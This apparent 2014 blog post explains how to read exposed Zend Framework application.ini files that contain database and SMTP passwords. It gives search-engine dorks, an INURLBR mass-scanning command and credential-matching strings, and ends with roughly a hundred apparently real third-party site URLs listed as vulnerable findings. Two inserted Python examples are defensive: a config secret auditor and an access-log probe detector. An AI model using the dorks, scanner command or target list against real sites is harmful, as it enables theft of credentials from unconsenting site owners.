
Wednesday, July 16, 2014

Exploiting the Zend Framework Full Info Disclosure flaw


This flaw exposes the .ini configuration file of web applications built on Zend Framework for reading; such files contain database and SMTP passwords.

Vulnerability[0]=> http://target.com/application/configs/{file}.ini
Example:
http://target.com/application/configs/application.ini
http://target.com/application/configs/db.ini
http://target.com/application/configs/config.ini

In the file contents we can find the following parameters.


; Database access credentials
resources.db.params.host = "mysql.target.com.br"
resources.db.params.username = "root"
resources.db.params.password = "123455"


; And SMTP access credentials too
resources.mail.transport.host = "smtp.target.com.br"
resources.mail.transport.auth = "login"
resources.mail.transport.username = "wangxydlutre"
resources.mail.transport.password = "12333"
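To see what is actually lost when this file is web-reachable, here is an added example (not code from the original post or from the Zend project) that parses a Zend Framework 1 application.ini, resolves the `[staging : production]` section inheritance that Zend_Config_Ini supports, and lists every secret-bearing key per environment. The ini text is constructed from the keys quoted above with made-up hosts and values; which key suffixes count as secrets (`SECRET_KEY_RE`) is this example's own assumption.

```python
"""Audit a Zend Framework 1 application.ini for the credentials that would
leak if the file were web-reachable.

Added example, not code from the original post or from the Zend project.
SAMPLE_INI is constructed from the key names quoted in the post; the hosts
and values are made up, and SECRET_KEY_RE is this example's own choice of
which key suffixes count as secrets.
"""
import configparser
import re

# Constructed sample: the keys the post shows, plus ZF1's
# "[child : parent]" section inheritance, so the audit can show how a
# secret defined once in [production] is inherited by every environment.
SAMPLE_INI = """\
[production]
phpSettings.display_errors = 0
resources.db.adapter = "PDO_MYSQL"
resources.db.params.host = "mysql.example.invalid"
resources.db.params.username = "root"
resources.db.params.password = "123455"
resources.db.params.dbname = "shop"
resources.mail.transport.host = "smtp.example.invalid"
resources.mail.transport.auth = "login"
resources.mail.transport.username = "mailer"
resources.mail.transport.password = "12333"

[staging : production]
resources.db.params.host = "mysql-staging.example.invalid"

[development : staging]
phpSettings.display_errors = 1
resources.db.params.password = "devpass"
"""

# Key suffixes treated as secrets (assumption; extend for your own config).
SECRET_KEY_RE = re.compile(r"\.(password|passwd|secret|apikey|api_key|token)$", re.I)


def _unquote(value):
    """Zend_Config_Ini values are usually written in double quotes."""
    value = value.strip()
    if len(value) >= 2 and value[0] == value[-1] == '"':
        value = value[1:-1]
    return value


def parse_zend_ini(text):
    """Return {section: {key: value}} with '[child : parent]' inheritance
    resolved, so each section holds the effective keys of that environment."""
    cp = configparser.ConfigParser(interpolation=None, strict=True)
    cp.optionxform = str  # keep dotted keys exactly as written
    cp.read_string(text)

    raw, parent_of = {}, {}
    for header in cp.sections():
        name, _, parent = (part.strip() for part in header.partition(":"))
        raw[name] = {k: _unquote(v) for k, v in cp.items(header)}
        parent_of[name] = parent or None

    def effective(name, seen=()):
        if name in seen:
            raise ValueError("inheritance loop at section %r" % name)
        merged = {}
        if parent_of.get(name):
            merged.update(effective(parent_of[name], seen + (name,)))
        merged.update(raw[name])  # child keys override the parent's
        return merged

    return {name: effective(name) for name in raw}


def redact(value):
    """Keep the first and last character so a finding is recognisable
    without reproducing the secret."""
    if len(value) <= 2:
        return "*" * len(value)
    return value[0] + "*" * (len(value) - 2) + value[-1]


def find_exposed_credentials(text):
    """List (section, key, redacted value) for every secret-bearing key,
    after inheritance, so a password set once in [production] is reported
    for each environment that inherits it."""
    findings = []
    for section, items in parse_zend_ini(text).items():
        for key in sorted(items):
            if SECRET_KEY_RE.search(key):
                findings.append((section, key, redact(items[key])))
    return findings


if __name__ == "__main__":
    for section, key, shown in find_exposed_credentials(SAMPLE_INI):
        print("[%s] %s = %s" % (section, key, shown))
```

Run against the constructed sample it reports six findings: the database and SMTP passwords for production, and the same two keys again for staging and development, because a single leaked file discloses every environment's inherited credentials, not only the one the server is running.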


DORK[0]=> inurl:/application/configs/application.ini

DORK[1]=>
site:com ext:ini inurl:/application/  -inurl:"git*" -github -assembla -inurl:mozilla -inurl:google "params.password"

DORK[2]=> -site:.google.com -site:.github.com -site:.sourceforge.net -site:.googlecode.com inurl:/application/configs/ "params" ext:ini

DORK[3]=> inurl:/configs/ "params.password" db.ini ext:ini

DORK[4]=> -github.com -mozilla.org -.google.com inurl:/application/  ext:ini password



[+][ COMMAND SCANNER INURLBR ]
./inurlbr.php --dork 'site:com ext:ini inurl:/application/  -github -assembla -inurl:mozilla -inurl:svn "params.password"'  -s zend.txt -q 1,6,7,14,22


[+][ VALIDATION ZEND FRAMEWORK ]
$validation['ZEND-FRAMEWORK-01'] = 'mail.transport.username';
$validation['ZEND-FRAMEWORK-02'] = 'mail.transport.password';
$validation['ZEND-FRAMEWORK-03'] = 'db.params.username';
$validation['ZEND-FRAMEWORK-04'] = 'db.params.password';
$validation['ZEND-FRAMEWORK-05'] = 'db.params.dbname';
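Seen from the server side, the dorks and scanner above turn into a recognisable request shape in the access log. The following added example (not code from the original post or from INURLBR) parses Apache combined-format log lines, flags any request for an .ini file under an `application/` path, and separates requests the server actually answered with the file ("exposed") from refused or not-found probes. The log lines are constructed, using documentation addresses; `INI_PATH_RE` is this example's own pattern, built from the URL shapes listed in the post.

```python
"""Spot requests for Zend Framework ini files in a web server access log.

Added example, not code from the original post or from the INURLBR tool.
SAMPLE_LOG is constructed (Apache "combined" format, documentation
addresses); INI_PATH_RE is this example's own pattern, built from the
URL shapes the post lists (.../application/configs/*.ini and variants).
"""
import re
from collections import Counter

SAMPLE_LOG = """\
203.0.113.5 - - [16/Jul/2014:10:01:12 +0000] "GET /application/configs/application.ini HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Jul/2014:10:01:13 +0000] "GET /application/configs/db.ini HTTP/1.1" 404 512 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Jul/2014:10:02:40 +0000] "GET /index.php HTTP/1.1" 200 9012 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Jul/2014:10:02:41 +0000] "GET /images/logo.ini HTTP/1.1" 404 300 "-" "Mozilla/5.0"
192.0.2.9 - - [16/Jul/2014:10:05:00 +0000] "GET /admin/application/configs/application.ini?x=1 HTTP/1.1" 403 221 "-" "curl/7.35.0"
192.0.2.9 - - [16/Jul/2014:10:05:01 +0000] "GET /test/application/config/config.ini HTTP/1.1" 200 700 "-" "curl/7.35.0"
"""

# Apache "combined" format: client, ident, user, [timestamp], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Any .ini under an "application/" path segment, with or without a query string.
INI_PATH_RE = re.compile(r"/application/[^?\s]*\.ini(?:\?|$)", re.I)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def scan_access_log(text):
    """Return one finding per request that targets an application ini file.
    verdict 'exposed' means the server actually returned the file (2xx);
    'probe' means it was asked for and refused or not found."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if not entry or not INI_PATH_RE.search(entry["path"]):
            continue
        entry["verdict"] = "exposed" if 200 <= entry["status"] < 300 else "probe"
        findings.append(entry)
    return findings


def summarize(findings):
    """Counts by verdict and by source address, for a quick triage view."""
    return {
        "by_verdict": Counter(f["verdict"] for f in findings),
        "by_ip": Counter(f["ip"] for f in findings),
    }


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for f in found:
        print("%-8s %s %s %s" % (f["verdict"], f["ip"], f["status"], f["path"]))
    print(summarize(found))
```

An "exposed" hit means the database and SMTP credentials in that file should be treated as compromised and rotated. The root cause is that the `application/` tree sits inside the web root at all: Zend Framework 1's recommended layout points the DocumentRoot at `public/`, so `application/configs/` is never reachable over HTTP, and a 403 from the web server is only a second line of defence.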

0xExample findings: zend

https://www.thoex.com/urrunarrak-handball/application/configs/application.ini?
https://www.thoex.com/urrunarrak2/application/configs/application.ini?
http://www.rydusa.com/application/configs/application.ini?
http://snobmonkey.com/test/application/configs/application.ini?
http://www.firecompanies.com/MFC/application/config/application.ini?
http://www.statzpack.com/soccer_web/soccer/application/config/config.ini?
http://danielberard.com/application/configs/application.ini?
http://www.kreatera.com/library/Benux/Application/configs/application.ini?
http://www.tremendosoftware.com/sms/application/configs/application.ini?
http://galaxybis.com/demos/zf1/application/configs/application.ini?
http://www.ovdev.mit-consult.com/orizonqs/application/configs/application.ini?
http://amdinner.com/admin/application/application.ini?
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini?
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini?
http://www.aps-cctv.com/boardPhotos/application.ini?
http://developer.camerocks.com/temp/newscan/application/configs/application.ini?
http://svn.turbocrms.com/trac/browser/clients/agencyengland/jorvik/backend/application/configs/application.ini?
http://www.comsucopia.com/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?


http://www.getsocialwithrb.com/rec0219/airwick/application/configs/application.ini
http://www.aps-cctv.com/boardPhotos/application.ini
http://snobmonkey.com/test/application/configs/application.ini
http://velcro-lab.com/touch/application/configs/application.ini
http://www.ratcmatrimony.com/application/configs/application.ini
http://ucgoz.com/deneme2/application/configs/application.ini
http://ifood.introserver.com/application/configs/application.ini
http://staging.gonabit.com/hintbased.com/admin/application/configs/application.ini
http://www.altusinfra.com/application/configs/application.ini
http://www.thenamesticker.com/application/configs/application.ini
http://stasdavydov.com/price_cmp/application/configs/application.ini
https://www.mitylite.com/application/configs/application.ini
http://dev.blancali.com/_old2/application/configs/application.ini
http://city-immobilier.com/application/configs/application.ini
http://www.emotionla.com/staging/vivanda/vivanda-mobile/application/configs/application.ini
http://23sec.com/api/application/configs/application.ini
https://xp-dev.com/sc/diff/71005/39/45//application/configs/application.ini
http://www.rydusa.com/application/configs/application.ini
http://www.prod2020.com/_hybris-cra/application/configs/application.ini
http://xolotlti.com/fabricadecine/application/configs/application.ini
http://www.test.unibox.com/application/configs/application.ini
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini
http://users.spytosave.com/spyapp/application/configs/application.ini
http://www.monigrafica.com/application/configs/application.ini
http://clossmancommunications.com/frapi/admin/application/config/application.ini
http://archi-tech-media.com/thedigitalkingdom/application/configs/application.ini
http://www.kreatera.com/library/Benux/Application/configs/application.ini
http://li258-109.members.linode.com/application/configs/application.ini
http://www.techques.com/question/1-4484965/How-to-set-database-time-zone-in-application.ini
http://bizarrefx.com/bfx/searchd/application/configs/application.ini
http://www.hellobrothers.com/jobs/application.ini
http://www.ovdev.mit-consult.com/exc1/application/configs/application.ini
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini
http://www.digilibro.com/Crisol/RestServer/application/configs/application.ini
http://secure.vfwebserver.com/ewe/application/configs/application.ini
http://ihuntyou.com/agrobrain/trunk/application/configs/application.ini
http://ronlinecdn.com/st/application/configs/application.ini
http://yodpolitician.yodsoft.com/application/configs/application.ini
http://kerberosdevelopment.com/centurion/application/configs/db.ini
http://www.dev-stagingserver.com/noophy/application/configs/application.ini
http://www.intell-sol.com/subdomains/wandelion/admin/application/configs/application.ini
http://paintourhome.com/application/configs/application.ini
http://www.mywebsitedemos.com/broomberg/application/configs/application.ini
http://fidelcrm.com/fbconnect/zblog/application/configs/application.ini
http://developermalik.com/chad/application/configs/application.ini
http://developermalik.com/uPolitics/application/configs/application.ini
http://km.comuf.com/application/configs/application.ini
http://qljsystems.com/doctrine2/ralphschindler-NOLASnowball-3c9f906/application/configs/application.ini
http://50-87-21-130.unifiedlayer.com/astonis/application/configs/application.ini
http://bepcongnghiepjsc.com/application/configs/application.ini
http://galaxybis.com/demos/zf1/application/configs/application.ini
http://masdag.com/watchit/application/configs/config.ini
http://www.comsucopia.com/application/configs/application.ini
http://campusrain.com/wow/application/configs/application.ini
http://www.myanmar-restaurants.com/updates/myanmar/stage/application/configs/sites/myanmar-updates.ini
http://churchcims.com/staging/application/configs/application.ini
http://hashib23.uniquewebers.com/hospital/application/configs/application.ini
http://support.orioly.com/svjetskiputnik.hr/application/configs/application.ini
http://tmh.riktamtech.com/blinkword/application/configs/application.ini
http://shopping.idincorp.com/application/configs/application.ini
https://www.arabforwarding.com/vhosts/loyacjordan.org/httpdocs/loyac/application/configs/application.ini
https://www.arabforwarding.com/vhosts/__www.fnms-medical.com/httpdocs/application/configs/application.ini
http://elamatute.com/application/configs/application.ini
http://www.originalsexnetwork.com/application/configs/application.ini
http://www.palstu.com/contactus2/application/configs/application.ini
http://web.ontuts.com/wp-content/uploads/tutoriales/zendframework/zendframework_layouts/application/config/application.ini
https://daralyasmine.com/vhosts/daralyasmine.com/httpdocs/application/configs/application.ini
http://www.tributosonline.com/application/configs/application.ini
http://www.nichequotes.com/zend/application/config.ini
http://webkathon.com/alumni/application/configs/application.ini
http://web1.kindlebit.com/PHP-Team/vijay/don/codecanyon-4210316-monsterfile-multiuser-file-management/MonsterFile/application/configs/monster.ini
http://www.investmysite.com/application/config/config_db.ini
http://dulichcampuchiagiare.com/application/configs/application.ini
http://eshopbox.com/checkout/application/configs/application.ini
http://www.oi915.com/application/modules/admin/application.ini
https://xp-dev.com/sc/71005/65//application/configs/application.ini
http://www.prod2020.com/france-tv/application/configs/db.ini
http://amdinner.com/admin/application/application.ini
http://www.emotionla.com/clientes/plazavea/plazavea-qr/application/configs/application.ini
http://staging.gonabit.com/hintbased.com/application/configs/application.ini
http://www.palstu.com/tawjihi/application/configs/application.ini
http://ronlinecdn.com/sap/application/configs/application.ini
http://myanmar-restaurants.com/updates/movie/prod/application/configs/sites/myanmar-updates.ini
Exploit:
http://www.exploit-db.com/exploits/29921/
